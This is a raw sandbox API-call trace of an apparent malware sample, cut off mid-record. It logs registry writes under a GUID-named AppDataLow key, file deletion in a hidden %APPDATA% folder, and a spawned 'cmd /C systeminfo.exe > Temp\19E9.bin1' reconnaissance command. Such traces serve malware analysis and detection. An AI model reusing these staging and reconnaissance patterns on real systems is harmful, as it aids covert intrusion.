[0256.884] mbstowcs (in: _Dest=0x79b3f60, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin", _MaxCount=0x2e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin") returned 0x2d [0256.885] GetProcAddress (hModule=0x7ff977b60000, lpProcName="CoCreateGuid") returned 0x7ff9778a2340 [0256.885] CoCreateGuid (in: pguid=0x235fe40 | out: pguid=0x235fe40*(Data1=0x5b8152a, Data2=0xdec2, Data3=0x4735, Data4=([0]=0xa1, [1]=0xf4, [2]=0xe9, [3]=0xda, [4]=0x1f, [5]=0xb8, [6]=0x5, [7]=0xea))) returned 0x0 [0256.885] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin") returned 45 [0256.885] RegCreateKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Files", phkResult=0x235fde0 | out: phkResult=0x235fde0*=0x12c4) returned 0x0 [0256.885] RegSetValueExA (in: hKey=0x12c4, lpValueName="2A15B805C2DE35470F", Reserved=0x0, dwType=0x3, lpData=0x79b3710*, cbData=0x5c | out: lpData=0x79b3710*) returned 0x0 [0256.886] RegCloseKey (hKey=0x12c4) returned 0x0 [0256.886] CloseHandle (hObject=0x930) returned 1 [0256.886] lstrlenA (lpString="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 58 [0256.886] mbstowcs (in: _Dest=0x7aae530, _Source="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", _MaxCount=0x3b | out: _Dest="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 0x3a [0256.886] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0256.886] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", lpDst=0x7aae5b0, nSize=0x57 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 0x57 [0256.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 86 [0256.886] PathCombineW (in: pszDest=0x79c8b70, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\*.*" [0256.886] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\*.*", lpFindFileData=0x79c8c30 | out: lpFindFileData=0x79c8c30) returned 0x442ff30 [0256.886] FindNextFileW (in: hFindFile=0x442ff30, lpFindFileData=0x79c8c30 | out: lpFindFileData=0x79c8c30) returned 1 [0256.886] FindNextFileW (in: hFindFile=0x442ff30, lpFindFileData=0x79c8c30 | out: lpFindFileData=0x79c8c30) returned 1 [0256.886] lstrlenW (lpString="01D4756785E0F97F09") returned 18 [0256.886] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", pszFile="01D4756785E0F97F09" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09" [0256.886] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{25e2f79f-402d-9fbf-7229-7443c66de827}\\01d4756785e0f97f09")) returned 1 [0256.888] FindNextFileW (in: hFindFile=0x442ff30, lpFindFileData=0x79c8c30 | out: lpFindFileData=0x79c8c30) returned 0 [0256.888] FindClose (in: hFindFile=0x442ff30 | out: hFindFile=0x442ff30) returned 1 Thread: id = 238 os_tid = 0x8e8 [0271.095] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.095] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x2deea0, pvData=0x2deea8, pcbData=0x2deea4*=0x4 | out: pdwType=0x2deea0*=0x0, pvData=0x2deea8, pcbData=0x2deea4*=0x4) returned 0x2 [0271.095] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.095] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x2deea0, pvData=0x2deea8, pcbData=0x2deea4*=0x4 | out: pdwType=0x2deea0*=0x4, pvData=0x2deea8*=0x1, pcbData=0x2deea4*=0x4) returned 0x0 [0271.096] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.096] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x2ddf80, pvData=0x2ddf88, pcbData=0x2ddf84*=0x4 | out: pdwType=0x2ddf80*=0x0, pvData=0x2ddf88, pcbData=0x2ddf84*=0x4) returned 0x2 [0271.096] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.096] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x2ddf80, pvData=0x2ddf88, pcbData=0x2ddf84*=0x4 | out: pdwType=0x2ddf80*=0x0, pvData=0x2ddf88, pcbData=0x2ddf84*=0x4) returned 0x2 [0271.097] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.097] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x2dec80, pvData=0x2dec88, pcbData=0x2dec84*=0x4 | out: pdwType=0x2dec80*=0x0, pvData=0x2dec88, pcbData=0x2dec84*=0x4) returned 0x2 [0271.097] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.097] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x2dec80, pvData=0x2dec88, pcbData=0x2dec84*=0x4 | out: pdwType=0x2dec80*=0x0, pvData=0x2dec88, pcbData=0x2dec84*=0x4) returned 0x2 Thread: id = 239 os_tid = 0x598 [0271.105] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.105] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x235f040, pvData=0x235f048, pcbData=0x235f044*=0x4 | out: pdwType=0x235f040*=0x0, pvData=0x235f048, pcbData=0x235f044*=0x4) returned 0x2 [0271.105] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.105] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x235f040, pvData=0x235f048, pcbData=0x235f044*=0x4 | out: pdwType=0x235f040*=0x4, pvData=0x235f048*=0x1, pcbData=0x235f044*=0x4) returned 0x0 [0271.105] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.105] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x235e120, pvData=0x235e128, pcbData=0x235e124*=0x4 | out: pdwType=0x235e120*=0x0, pvData=0x235e128, pcbData=0x235e124*=0x4) returned 0x2 [0271.106] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.106] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x235e120, pvData=0x235e128, pcbData=0x235e124*=0x4 | out: pdwType=0x235e120*=0x0, pvData=0x235e128, pcbData=0x235e124*=0x4) returned 0x2 [0271.106] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.106] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x235ee20, pvData=0x235ee28, pcbData=0x235ee24*=0x4 | out: pdwType=0x235ee20*=0x0, pvData=0x235ee28, pcbData=0x235ee24*=0x4) returned 0x2 [0271.106] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.106] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x235ee20, pvData=0x235ee28, pcbData=0x235ee24*=0x4 | out: pdwType=0x235ee20*=0x0, pvData=0x235ee28, pcbData=0x235ee24*=0x4) returned 0x2 Thread: id = 240 os_tid = 0x784 [0271.112] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.112] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x2defe0, pvData=0x2defe8, pcbData=0x2defe4*=0x4 | out: pdwType=0x2defe0*=0x0, pvData=0x2defe8, pcbData=0x2defe4*=0x4) returned 0x2 [0271.113] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.113] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x2defe0, pvData=0x2defe8, pcbData=0x2defe4*=0x4 | out: pdwType=0x2defe0*=0x4, pvData=0x2defe8*=0x1, pcbData=0x2defe4*=0x4) returned 0x0 [0271.113] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.113] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x2de0c0, pvData=0x2de0c8, pcbData=0x2de0c4*=0x4 | out: pdwType=0x2de0c0*=0x0, pvData=0x2de0c8, pcbData=0x2de0c4*=0x4) returned 0x2 [0271.113] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.114] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x2de0c0, pvData=0x2de0c8, pcbData=0x2de0c4*=0x4 | out: pdwType=0x2de0c0*=0x0, pvData=0x2de0c8, pcbData=0x2de0c4*=0x4) returned 0x2 [0271.114] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.114] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x2dedc0, pvData=0x2dedc8, pcbData=0x2dedc4*=0x4 | out: pdwType=0x2dedc0*=0x0, pvData=0x2dedc8, pcbData=0x2dedc4*=0x4) returned 0x2 [0271.114] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.114] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x2dedc0, pvData=0x2dedc8, pcbData=0x2dedc4*=0x4 | out: pdwType=0x2dedc0*=0x0, pvData=0x2dedc8, pcbData=0x2dedc4*=0x4) returned 0x2 Thread: id = 241 os_tid = 0x990 [0271.124] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.124] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x235f050, pvData=0x235f058, pcbData=0x235f054*=0x4 | out: pdwType=0x235f050*=0x0, pvData=0x235f058, pcbData=0x235f054*=0x4) returned 0x2 [0271.124] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.124] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x235f050, pvData=0x235f058, pcbData=0x235f054*=0x4 | out: pdwType=0x235f050*=0x4, pvData=0x235f058*=0x1, pcbData=0x235f054*=0x4) returned 0x0 [0271.125] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.125] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x235e130, pvData=0x235e138, pcbData=0x235e134*=0x4 | out: pdwType=0x235e130*=0x0, pvData=0x235e138, pcbData=0x235e134*=0x4) returned 0x2 [0271.126] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.126] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x235e130, pvData=0x235e138, pcbData=0x235e134*=0x4 | out: pdwType=0x235e130*=0x0, pvData=0x235e138, pcbData=0x235e134*=0x4) returned 0x2 [0271.126] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.126] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x235ee30, pvData=0x235ee38, pcbData=0x235ee34*=0x4 | out: pdwType=0x235ee30*=0x0, pvData=0x235ee38, pcbData=0x235ee34*=0x4) returned 0x2 [0271.126] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.126] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x235ee30, pvData=0x235ee38, pcbData=0x235ee34*=0x4 | out: pdwType=0x235ee30*=0x0, pvData=0x235ee38, pcbData=0x235ee34*=0x4) returned 0x2 Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x34afd000" os_pid = "0xbf0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "cmd /C \"systeminfo.exe > C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1590 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1591 start_va = 0x4a21dc0000 end_va = 0x4a21ddffff entry_point = 0x0 region_type = private name = "private_0x0000004a21dc0000" filename = "" Region: id = 1592 start_va = 0x4a21de0000 end_va = 0x4a21df3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a21de0000" filename = "" Region: id = 1593 start_va = 0x4a21e00000 end_va = 0x4a21efffff entry_point = 0x0 region_type = private name = "private_0x0000004a21e00000" filename = "" Region: id = 1594 start_va = 0x4a21f00000 end_va = 0x4a21f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a21f00000" filename = "" Region: id = 1595 start_va = 0x4a21f10000 end_va = 0x4a21f10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a21f10000" filename = "" Region: id = 1596 start_va = 0x4a21f20000 end_va = 0x4a21f21fff entry_point = 0x0 region_type = private name = "private_0x0000004a21f20000" filename = "" Region: id = 1597 start_va = 0x7df5ff210000 end_va = 0x7ff5ff20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff210000" filename = "" Region: id = 1598 start_va = 0x7ff60cba0000 end_va = 0x7ff60cbc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60cba0000" filename = "" Region: id = 1599 start_va = 0x7ff60cbcd000 end_va = 0x7ff60cbcdfff entry_point = 0x0 region_type = private name = "private_0x00007ff60cbcd000" filename = "" Region: id = 1600 start_va = 0x7ff60cbce000 end_va = 0x7ff60cbcffff entry_point = 0x0 region_type = private name = "private_0x00007ff60cbce000" filename = "" Region: id = 1601 start_va = 0x7ff60d9c0000 end_va = 0x7ff60da18fff entry_point = 0x7ff60d9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1602 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1612 start_va = 0x4a22000000 end_va = 0x4a220fffff entry_point = 0x0 region_type = private name = "private_0x0000004a22000000" filename = "" Region: id = 1613 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1614 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1821 start_va = 0x4a21dc0000 end_va = 0x4a21dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a21dc0000" filename = "" Region: id = 1822 start_va = 0x4a21dd0000 end_va = 0x4a21dd6fff entry_point = 0x0 region_type = private name = "private_0x0000004a21dd0000" filename = "" Region: id = 1823 start_va = 0x4a21f30000 end_va = 0x4a21fedfff entry_point = 0x4a21f30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1824 start_va = 0x4a22100000 end_va = 0x4a221fffff entry_point = 0x0 region_type = private name = "private_0x0000004a22100000" filename = "" Region: id = 1825 start_va = 0x4a22220000 end_va = 0x4a2222ffff entry_point = 0x0 region_type = private name = "private_0x0000004a22220000" filename = "" Region: id = 1826 start_va = 0x7ff60caa0000 end_va = 0x7ff60cb9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60caa0000" filename = "" Region: id = 1827 start_va = 0x7ff60cbcb000 end_va = 0x7ff60cbccfff entry_point = 0x0 region_type = private name = "private_0x00007ff60cbcb000" filename = "" Region: id = 1828 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1833 start_va = 0x4a21ff0000 end_va = 0x4a21ff6fff entry_point = 0x0 region_type = private name = "private_0x0000004a21ff0000" filename = "" Region: id = 1834 start_va = 0x4a22230000 end_va = 0x4a22566fff entry_point = 0x4a22230000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 108 os_tid = 0x9c4 [0254.347] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff60d9c0000 [0254.348] __set_app_type (_Type=0x1) [0254.348] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff60d9d44a0) returned 0x0 [0254.348] __getmainargs (in: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8, _DoWildCard=0, _StartInfo=0x7ff60d9ef104 | out: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8) returned 0 [0254.348] GetCurrentThreadId () returned 0x9c4 [0254.348] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c4) returned 0x6c [0254.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0254.348] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetThreadUILanguage") returned 0x7ff977acd550 [0254.348] SetThreadUILanguage (LangId=0x0) returned 0x409 [0254.433] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0254.433] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4a21effc38 | out: phkResult=0x4a21effc38*=0x0) returned 0x2 [0254.434] VirtualQuery (in: lpAddress=0x4a21effc24, lpBuffer=0x4a21effba0, dwLength=0x30 | out: lpBuffer=0x4a21effba0*(BaseAddress=0x4a21eff000, AllocationBase=0x4a21e00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0254.434] VirtualQuery (in: lpAddress=0x4a21e00000, lpBuffer=0x4a21effba0, dwLength=0x30 | out: lpBuffer=0x4a21effba0*(BaseAddress=0x4a21e00000, AllocationBase=0x4a21e00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0254.434] VirtualQuery (in: lpAddress=0x4a21e01000, lpBuffer=0x4a21effba0, dwLength=0x30 | out: lpBuffer=0x4a21effba0*(BaseAddress=0x4a21e01000, AllocationBase=0x4a21e00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0254.434] VirtualQuery (in: lpAddress=0x4a21e04000, lpBuffer=0x4a21effba0, dwLength=0x30 | out: lpBuffer=0x4a21effba0*(BaseAddress=0x4a21e04000, AllocationBase=0x4a21e00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0254.434] VirtualQuery (in: lpAddress=0x4a21f00000, lpBuffer=0x4a21effba0, dwLength=0x30 | out: lpBuffer=0x4a21effba0*(BaseAddress=0x4a21f00000, AllocationBase=0x4a21f00000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30 [0254.434] GetConsoleOutputCP () returned 0x1b5 [0254.438] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0254.438] SetConsoleCtrlHandler (HandlerRoutine=0x7ff60d9e15d0, Add=1) returned 1 [0254.438] _get_osfhandle (_FileHandle=1) returned 0x24 [0254.438] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0254.439] _get_osfhandle (_FileHandle=1) returned 0x24 [0254.439] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0254.440] _get_osfhandle (_FileHandle=1) returned 0x24 [0254.440] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0254.440] _get_osfhandle (_FileHandle=0) returned 0x20 [0254.440] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0254.441] _get_osfhandle (_FileHandle=0) returned 0x20 [0254.441] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0254.442] GetEnvironmentStringsW () returned 0x4a22005600* [0254.442] FreeEnvironmentStringsA (penv="=") returned 1 [0254.442] GetEnvironmentStringsW () returned 0x4a22005600* [0254.442] FreeEnvironmentStringsA (penv="=") returned 1 [0254.442] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a21efeae8 | out: phkResult=0x4a21efeae8*=0x78) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x0, lpData=0x4a21efeb00*=0x1, lpcbData=0x4a21efeae4*=0x1000) returned 0x2 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x1, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x0, lpData=0x4a21efeb00*=0x1, lpcbData=0x4a21efeae4*=0x1000) returned 0x2 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x0, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x40, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x40, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x0, 